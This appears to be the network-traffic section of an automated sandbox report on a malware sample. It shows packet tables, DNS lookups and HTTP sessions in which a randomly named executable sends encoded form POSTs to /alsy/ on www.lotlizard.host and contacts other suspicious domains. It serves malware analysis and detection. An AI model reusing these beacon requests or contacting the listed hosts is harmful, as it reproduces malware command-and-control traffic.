            Sep 16, 2024 14:45:51.459212065 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.459285975 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459355116 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.459403992 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459884882 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.459938049 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459980965 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.460032940 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.461604118 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.461659908 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.461688995 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.461745024 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.463134050 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.463186979 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.463215113 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.463269949 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.464561939 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.464612007 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.464642048 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.464704990 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.466114044 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.466171026 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.466192961 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.466244936 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.467600107 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.467663050 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.467683077 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.467812061 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.469192982 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.469254971 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.469275951 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.469324112 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.470453978 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.470509052 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.470535994 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.470592022 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.471949100 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.472003937 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.472045898 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.472095966 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.476515055 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478097916 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478168011 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.478182077 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478223085 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.478229046 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478269100 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.480918884 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483079910 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483160019 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.483166933 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483207941 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.483212948 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483253002 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487441063 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487592936 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487652063 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487658978 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487694979 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487699986 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487740040 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487796068 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487852097 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491204023 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491252899 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491329908 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491394043 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491470098 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491527081 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491561890 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491615057 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491652012 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491710901 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491734982 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491786957 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.495839119 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.495894909 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496006966 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.496057034 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496090889 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496093988 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.496251106 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496258974 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.496311903 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:46:25.917165041 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:25.922094107 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:25.922270060 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:25.929341078 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:25.934473991 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:26.457982063 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:26.458354950 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:26.458436012 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:26.461410046 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:26.466243029 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:41.556912899 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:41.561743975 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:41.563404083 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:41.574063063 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:41.578846931 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163629055 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163687944 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163727045 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163747072 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:42.163891077 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:43.076448917 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.095979929 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.100912094 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.100994110 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.114041090 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.118946075 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703094959 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703139067 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703207016 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703298092 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.703298092 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:45.623452902 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.641495943 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.646787882 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.646899939 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.655886889 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.660928965 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.660959005 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.660984993 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661041975 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661070108 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661096096 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661120892 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661147118 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661180019 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229249954 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229305983 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229473114 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:47.229479074 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229535103 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:48.170268059 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.188409090 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.193443060 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.193558931 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.202543974 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.208962917 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.774950981 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.774979115 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.774996996 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.775182962 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.775296926 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.778918028 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.783798933 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:47:04.174483061 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.179347992 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.179444075 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.193875074 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.198784113 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.841710091 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.842608929 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.842634916 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.842715979 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.842746973 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:05.701356888 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.720344067 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.725440979 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:06.725577116 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.736052036 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.740974903 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.378307104 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.381711960 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.381747007 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.381793022 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:07.381793022 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:08.654592037 CEST4974880192.168.2.435.190.52.58

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 16, 2024 14:45:05.340198040 CEST6378853192.168.2.41.1.1.1
            Sep 16, 2024 14:45:05.620306015 CEST53637881.1.1.1192.168.2.4
            Sep 16, 2024 14:45:06.706384897 CEST5613953192.168.2.41.1.1.1
            Sep 16, 2024 14:45:06.714308023 CEST53561391.1.1.1192.168.2.4
            Sep 16, 2024 14:46:25.682423115 CEST5371853192.168.2.41.1.1.1
            Sep 16, 2024 14:46:25.911734104 CEST53537181.1.1.1192.168.2.4
            Sep 16, 2024 14:46:41.517086983 CEST5435653192.168.2.41.1.1.1
            Sep 16, 2024 14:46:41.554780960 CEST53543561.1.1.1192.168.2.4
            Sep 16, 2024 14:46:54.784027100 CEST5115353192.168.2.41.1.1.1
            Sep 16, 2024 14:46:54.827878952 CEST53511531.1.1.1192.168.2.4
            Sep 16, 2024 14:47:03.496795893 CEST5818953192.168.2.41.1.1.1
            Sep 16, 2024 14:47:04.170742989 CEST53581891.1.1.1192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Sep 16, 2024 14:45:05.340198040 CEST192.168.2.41.1.1.10x958fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
            Sep 16, 2024 14:45:06.706384897 CEST192.168.2.41.1.1.10xc3f1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
            Sep 16, 2024 14:46:25.682423115 CEST192.168.2.41.1.1.10x3487Standard query (0)www.freel2charger.comA (IP address)IN (0x0001)false
            Sep 16, 2024 14:46:41.517086983 CEST192.168.2.41.1.1.10xe2f0Standard query (0)www.lotlizard.hostA (IP address)IN (0x0001)false
            Sep 16, 2024 14:46:54.784027100 CEST192.168.2.41.1.1.10x6d7aStandard query (0)www.amkmos.onlineA (IP address)IN (0x0001)false
            Sep 16, 2024 14:47:03.496795893 CEST192.168.2.41.1.1.10x475fStandard query (0)www.hsck520.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Sep 16, 2024 14:45:05.620306015 CEST1.1.1.1192.168.2.40x958fNo error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
            Sep 16, 2024 14:45:06.714308023 CEST1.1.1.1192.168.2.40xc3f1No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
            Sep 16, 2024 14:46:25.911734104 CEST1.1.1.1192.168.2.40x3487No error (0)www.freel2charger.com64.98.135.118A (IP address)IN (0x0001)false
            Sep 16, 2024 14:46:41.554780960 CEST1.1.1.1192.168.2.40xe2f0No error (0)www.lotlizard.hostlotlizard.hostCNAME (Canonical name)IN (0x0001)false
            Sep 16, 2024 14:46:41.554780960 CEST1.1.1.1192.168.2.40xe2f0No error (0)lotlizard.host66.29.141.40A (IP address)IN (0x0001)false
            Sep 16, 2024 14:46:54.827878952 CEST1.1.1.1192.168.2.40x6d7aName error (3)www.amkmos.onlinenonenoneA (IP address)IN (0x0001)false
            Sep 16, 2024 14:47:04.170742989 CEST1.1.1.1192.168.2.40x475fNo error (0)www.hsck520.com35.190.52.58A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • drive.google.com
            • drive.usercontent.google.com
            • www.freel2charger.com
            • www.lotlizard.host
            • www.hsck520.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.44974264.98.135.118805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:46:25.929341078 CEST457OUTGET /43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g= HTTP/1.1
            Host: www.freel2charger.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Sep 16, 2024 14:46:26.457982063 CEST973INHTTP/1.1 200 OK
            Server: nginx/1.14.2
            Date: Mon, 16 Sep 2024 12:46:26 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 33 31 63 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 21 2d 2d 20 52 65 64 69 72 65 63 74 69 6f 6e 20 53 65 72 76 69 63 65 73 20 63 65 6e 30 76 6c 72 65 64 69 72 30 31 20 2d 2d 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 27 31 30 30 25 2c 20 2a 27 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 6e 6f 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 30 20 62 6f 72 64 65 72 3d 30 3e 0a 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 69 6d 70 6c 65 75 72 6c 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2f 34 33 63 6a 2f 3f 79 44 37 34 3d 4b 56 37 38 38 64 45 48 31 26 37 4a 50 3d 54 35 78 62 68 73 69 35 46 75 68 7a 76 54 45 51 77 32 20 4b 54 32 46 73 48 4e 78 39 74 34 37 74 6f 7a 63 4b 66 20 77 6d 76 61 30 44 45 74 4f 79 45 6d 36 39 71 79 71 66 64 63 33 34 63 37 49 46 64 59 5a 33 32 46 7a 45 6b 32 7a 20 38 32 61 4c 4d 74 52 48 52 48 35 35 34 30 62 65 32 49 53 61 4b 62 77 43 74 20 6b 4e 53 72 44 66 4f 48 6f 58 36 6b 64 48 6b [TRUNCATED]
            Data Ascii: 31c<html><head><title></title></head>... Redirection Services cen0vlredir01 --><frameset rows='100%, *' frameborder=no framespacing=0 border=0><frame src="http://www.simpleurl.com/parking/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2 KT2FsHNx9t47tozcKf wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z 82aLMtRHRH5540be2ISaKbwCt kNSrDfOHoX6kdHk1g=" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame></frameset><noframes><h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br><center>Click <a href="http://www.simpleurl.com/parking/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2 KT2FsHNx9t47tozcKf wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z 82aLMtRHRH5540be2ISaKbwCt kNSrDfOHoX6kdHk1g=">here</a> to enter the site.</center></noframes></html>0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.44974366.29.141.40805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:46:41.574063063 CEST719OUTPOST /alsy/ HTTP/1.1
            Host: www.lotlizard.host
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en
            Connection: close
            Cache-Control: no-cache
            Content-Length: 200
            Content-Type: application/x-www-form-urlencoded
            Origin: http://www.lotlizard.host
            Referer: http://www.lotlizard.host/alsy/
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Data Raw: 37 4a 50 3d 68 48 67 35 30 33 4d 2f 53 6a 6e 56 4c 52 6e 5a 2b 61 32 67 52 6c 49 6d 47 53 75 7a 6f 6d 36 58 6e 71 47 34 4c 6f 5a 75 55 71 2f 63 54 49 6e 52 45 52 7a 6a 61 6d 6c 6a 59 39 4c 76 33 32 32 6b 43 63 68 50 42 56 69 2b 36 55 37 7a 4c 39 4b 34 42 4d 72 49 2b 39 36 65 4a 73 52 68 65 72 71 33 67 79 79 49 72 66 4c 51 52 35 64 4c 67 49 63 6c 6b 70 48 42 79 43 47 58 52 62 57 57 53 31 66 67 45 6e 70 67 39 31 32 67 4f 78 58 39 6b 39 4e 4f 4f 69 57 7a 65 62 45 33 77 2b 6d 67 64 6d 31 56 55 55 66 31 4f 2b 6b 4c 59 39 55 66 6c 55 41 70 76 76 6b 39 69 2b 35 34 31 6a 55 79 51 6c 65 37 2b 41 3d 3d
            Data Ascii: 7JP=hHg503M/SjnVLRnZ+a2gRlImGSuzom6XnqG4LoZuUq/cTInRERzjamljY9Lv322kCchPBVi+6U7zL9K4BMrI+96eJsRherq3gyyIrfLQR5dLgIclkpHByCGXRbWWS1fgEnpg912gOxX9k9NOOiWzebE3w+mgdm1VUUf1O+kLY9UflUApvvk9i+541jUyQle7+A==
            Sep 16, 2024 14:46:42.163629055 CEST1236INHTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 16 Sep 2024 12:46:42 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
            Sep 16, 2024 14:46:42.163687944 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.44974466.29.141.40805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:46:44.114041090 CEST739OUTPOST /alsy/ HTTP/1.1
            Host: www.lotlizard.host
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en
            Connection: close
            Cache-Control: no-cache
            Content-Length: 220
            Content-Type: application/x-www-form-urlencoded
            Origin: http://www.lotlizard.host
            Referer: http://www.lotlizard.host/alsy/
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Data Raw: 37 4a 50 3d 68 48 67 35 30 33 4d 2f 53 6a 6e 56 4a 79 2f 5a 39 35 75 67 58 46 49 70 4c 43 75 7a 6e 47 36 54 6e 71 43 34 4c 72 55 7a 42 49 4c 63 54 6f 33 52 46 51 7a 6a 5a 6d 6c 6a 54 64 4c 75 71 6d 32 6a 43 63 6c 74 42 58 47 2b 36 55 76 7a 4c 34 32 34 42 39 72 50 2f 74 36 63 63 38 52 6e 64 62 71 33 67 79 79 49 72 62 6e 36 52 35 56 4c 67 5a 73 6c 6c 4c 2f 43 74 79 48 6c 5a 37 57 57 5a 56 66 6b 45 6e 70 57 39 77 76 46 4f 7a 76 39 6b 38 39 4f 50 32 36 77 55 62 45 78 30 2b 6e 31 54 54 41 74 4b 6c 57 74 51 76 63 75 59 76 34 49 70 79 52 7a 2b 65 46 71 77 2b 64 4c 6f 6b 64 47 64 6d 6a 79 6c 44 6a 47 77 50 33 44 49 6d 2f 77 44 68 63 70 38 34 6b 43 76 4b 6f 3d
            Data Ascii: 7JP=hHg503M/SjnVJy/Z95ugXFIpLCuznG6TnqC4LrUzBILcTo3RFQzjZmljTdLuqm2jCcltBXG+6UvzL424B9rP/t6cc8Rndbq3gyyIrbn6R5VLgZsllL/CtyHlZ7WWZVfkEnpW9wvFOzv9k89OP26wUbEx0+n1TTAtKlWtQvcuYv4IpyRz+eFqw+dLokdGdmjylDjGwP3DIm/wDhcp84kCvKo=
            Sep 16, 2024 14:46:44.703094959 CEST1236INHTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 16 Sep 2024 12:46:44 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
